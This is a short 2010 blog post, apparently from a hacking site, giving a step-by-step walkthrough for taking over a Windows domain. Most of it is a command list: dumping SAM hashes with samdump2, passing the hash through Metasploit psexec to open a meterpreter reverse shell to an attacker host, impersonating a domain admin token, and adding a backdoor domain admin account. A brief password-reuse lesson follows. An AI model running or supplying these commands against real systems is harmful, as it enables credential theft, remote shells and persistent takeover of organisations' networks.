How to own a Windows Domain 2.0

February 20th, 2010 by Dev Team in Privilege Escalation, windows

Back in October we showed you a video on how to own a Windows domain by passing the hash from the local admin account to the domain server to add a new domain admin account. This newer version makes the task much easier using Backtrack4 and metasploit.

The commands used in the video:

mount /dev/sda1 /mnt/sda1
cd /mnt/sda1/WINDOWS/system32/config
samdump2 system SAM
use windows/smb/psexec
exploit -p windows/meterpreter/reverse_tcp -o LHOST=,LPORT=6789,RHOST=,SMBUser=Administrator,SMBPass= 123...:5654... -j
sessions -i 1
use incognito
list_tokens -u
impersonate_token mydomain\\domainadmin
execute -f cmd.exe -i -t
net user hack MPass5678 /add /domain
net group "Domain Admins" hack /add /domain

Lessons learned :
1. never reuse admin passwords, even if they are technically unbreakable
2. everything is a lot easier with the right tools.

Attack is compatible with WinXP/Vista/Win7/Windows Server2k3/Windows Server 2k7

Leave a reply